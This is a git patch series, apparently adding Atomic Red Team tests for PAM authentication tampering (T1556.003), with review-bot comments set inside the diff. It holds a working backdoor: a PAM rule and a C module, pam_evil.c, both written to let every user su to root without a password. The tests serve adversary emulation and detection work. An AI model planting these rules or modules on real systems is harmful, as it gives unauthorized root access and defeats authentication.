From 665573613fd769815ffc2bd0492d3f5e1bd18537 Mon Sep 17 00:00:00 2001
From: JChamblee99
Date: Thu, 12 Aug 2021 17:21:15 +0000
Subject: [PATCH 1/3] Added 2 tests for T1556.003
---
 atomics/T1556.003/T1556.003.yaml | 82 ++++++++++++++++++++++++++++++++
 atomics/T1556.003/src/pam_evil.c | 9 ++++
 2 files changed, 91 insertions(+)
 create mode 100644 atomics/T1556.003/T1556.003.yaml
 create mode 100644 atomics/T1556.003/src/pam_evil.c
diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml
new file mode 100644
index 00000000..931fb507
--- /dev/null
+++ b/atomics/T1556.003/T1556.003.yaml
@@ -0,0 +1,82 @@
+attack_technique: T1556.003
+display_name: 'Modify Authentication Process: Pluggable Authentication Modules'
+atomic_tests:
+- name: Malicious PAM rule
+ description: |
+ Inserts a rule into a PAM config and then tests it.
+
+ Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
+ supported_platforms:
+ - linux
+ input_arguments:
+ path_to_pam_conf:
+ description: PAM config file to modify.
+ type: string
+ default: /etc/pam.d/su-l
+ pam_rule:
+ description: Rule to add to the PAM config.
+ type: string
+ default: auth sufficient pam_succeed_if.so uid >= 0
+ index:
+ description: Index where the rule is inserted.
+ type: integer
+ default: 1
+ test_command:
+ description: Command used to test the PAM config.
+ type: string
+ default: echo "id" | su -l
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+ #{test_command}
+ cleanup_command: |
+ sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+- name: Malicious PAM module
+ description: |
+ Creates a PAM module, inserts a rule to use it, and then tests it.
+
+ Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
+ supported_platforms:
+ - linux
+ input_arguments:
+ path_to_pam_conf:
+ description: PAM config file to modify.
+ type: string
+ default: /etc/pam.d/su-l
+ pam_rule:
+ description: Rule to add to the PAM config.
+ type: string
+ default: auth sufficient /tmp/pam_evil.so
+ index:
+ description: Index where the rule is inserted.
+ type: integer
+ default: 1
+ test_command:
+ description: Command used to test the PAM config.
+ type: string
+ default: echo "id" | su -l
+ path_to_pam_module_source:
+ description: Path to PAM module source code.
+ type: path
+ default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
+ path_to_pam_module:
+ description: Path to PAM module object
+ type: path
+ default: /tmp/pam_evil.so
+ dependencies:
+ - description: |
+ The PAM module must exist on disk at specified location (#{path_to_pam_module})
+ prereq_command: |
+ if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+ #{test_command}
+ cleanup_command: |
+ sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
diff --git a/atomics/T1556.003/src/pam_evil.c b/atomics/T1556.003/src/pam_evil.c
new file mode 100644
index 00000000..30b97174
--- /dev/null
+++ b/atomics/T1556.003/src/pam_evil.c
@@ -0,0 +1,9 @@
+#include
+
+PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) {
+ return PAM_SUCCESS;
+}
+
+PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags,int argc, const char **argv) {
+ return PAM_SUCCESS;
+}
From a190c3d9c69be7de1338173ae7e0b1b2df47e858 Mon Sep 17 00:00:00 2001
From: JChamblee99
Date: Thu, 12 Aug 2021 18:24:53 +0000
Subject: [PATCH 2/3] Added dependency check for PAM development library
---
 atomics/T1556.003/T1556.003.yaml | 6 ++++++
 1 file changed, 6 insertions(+)
diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml
index 931fb507..8ffe2efa 100644
--- a/atomics/T1556.003/T1556.003.yaml
+++ b/atomics/T1556.003/T1556.003.yaml
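Review bot: Both executors modify `#{path_to_pam_conf}` in place with `sed -i` and both cleanups rely on an unanchored regex delete (`sed -i "\,#{pam_rule},d"`), so a run interrupted after the first `sed`, or a cleanup that never runs, leaves `auth sufficient pam_succeed_if.so uid >= 0` as the first line of `/etc/pam.d/su-l` and, per the description, lets every local user `su` to root without a password; the regex form also deletes any pre-existing line that happens to match and breaks if a supplied `pam_rule` contains a `,`. I would snapshot the config and restore it rather than pattern-delete: `sudo cp -p #{path_to_pam_conf} #{path_to_pam_conf}.atomic.bak` before the `sed -i`, and `sudo mv -f #{path_to_pam_conf}.atomic.bak #{path_to_pam_conf}` as the `cleanup_command` of both tests. In the second test the module is compiled by root into world-writable `/tmp` under a fixed name (`/tmp/pam_evil.so`) and the cleanup does not remove it; building into a root-owned directory, or at least appending `sudo rm -f #{path_to_pam_module}` to that cleanup, would avoid leaving a ready-made `auth sufficient` module on the host. Each `description` should also say that the rule is prepended (the `index` default is 1) and that the host is only restored when cleanup runs, so operators can judge the blast radius before executing.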
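Review bot: The two definitions in `pam_evil.c` are formatted inconsistently (`pam_sm_setcred( pam_handle_t *pamh, ... )` with padded parentheses versus `pam_sm_authenticate(pam_handle_t *pamh, int flags,int argc, ...)` with a missing space), and every parameter in both is unused, which produces `-Wunused-parameter` noise under `-Wextra`; I would normalise both to the `name(pam_handle_t *pamh, int flags, int argc, const char **argv)` form and add `(void)pamh; (void)flags; (void)argc; (void)argv;` at the top of each body. The `#include` on the first line shows no header name in this rendering — presumably `<security/pam_modules.h>`, matching the `/usr/include/security/pam_modules.h` check the series adds later — and should be confirmed in the committed file. A header comment such as `/* Atomic Red Team T1556.003 test artifact: pam_sm_authenticate and pam_sm_setcred return PAM_SUCCESS unconditionally, so any auth stack that lists this module as sufficient authenticates every caller. Lab use only. */` would tell anyone who finds the compiled object on a host what it is.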
@@ -66,6 +66,12 @@ atomic_tests:
 type: path
 default: /tmp/pam_evil.so
 dependencies:
+ - description: |
+ The PAM development library must be installed to build the PAM module
+ prereq_command: |
+ if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
 - description: |
 The PAM module must exist on disk at specified location (#{path_to_pam_module})
 prereq_command: |
From 3864732322308e18b7208b049f8f66a2b5a14f9f Mon Sep 17 00:00:00 2001
From: JChamblee99
Date: Sat, 14 Aug 2021 05:31:37 +0000
Subject: [PATCH 3/3] Removed test_command to resemble other atomic tests
---
 atomics/T1556.003/T1556.003.yaml | 10 ----------
 1 file changed, 10 deletions(-)
diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml
index 8ffe2efa..1c523b12 100644
--- a/atomics/T1556.003/T1556.003.yaml
+++ b/atomics/T1556.003/T1556.003.yaml
@@ -21,16 +21,11 @@ atomic_tests:
 description: Index where the rule is inserted.
 type: integer
 default: 1
- test_command:
- description: Command used to test the PAM config.
- type: string
- default: echo "id" | su -l
 executor:
 name: sh
 elevation_required: true
 command: |
 sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
- #{test_command}
 cleanup_command: |
 sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
 - name: Malicious PAM module
@@ -53,10 +48,6 @@ atomic_tests:
 description: Index where the rule is inserted.
 type: integer
 default: 1
- test_command:
- description: Command used to test the PAM config.
- type: string
- default: echo "id" | su -l
 path_to_pam_module_source:
 description: Path to PAM module source code.
 type: path
@@ -83,6 +74,5 @@ atomic_tests:
 elevation_required: true
 command: |
 sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
- #{test_command}
 cleanup_command: |
 sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
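Review bot: The `get_prereq_command` added here exits 0 whenever neither `apt-get` nor `yum` is found, because the `if`/`elif` chain has no `else`, so on dnf-only, zypper or pacman hosts the prerequisite installer reports success while `/usr/include/security/pam_modules.h` is still absent and the next dependency's `gcc` build will fail with a less obvious error; `which` is also missing on some minimal images, where POSIX `command -v` is the reliable probe. I would replace the line with `if command -v apt-get >/dev/null 2>&1; then sudo apt-get -y install libpam0g-dev; elif command -v dnf >/dev/null 2>&1; then sudo dnf -y install pam-devel; elif command -v yum >/dev/null 2>&1; then sudo yum -y install pam-devel; else echo "no supported package manager for the PAM headers" >&2; exit 1; fi`. Because this step installs a development package as root on the target, the `description` should state it plainly (`Installs libpam0g-dev (apt) or pam-devel (dnf/yum) via the system package manager`) so operators can refuse it on production hosts.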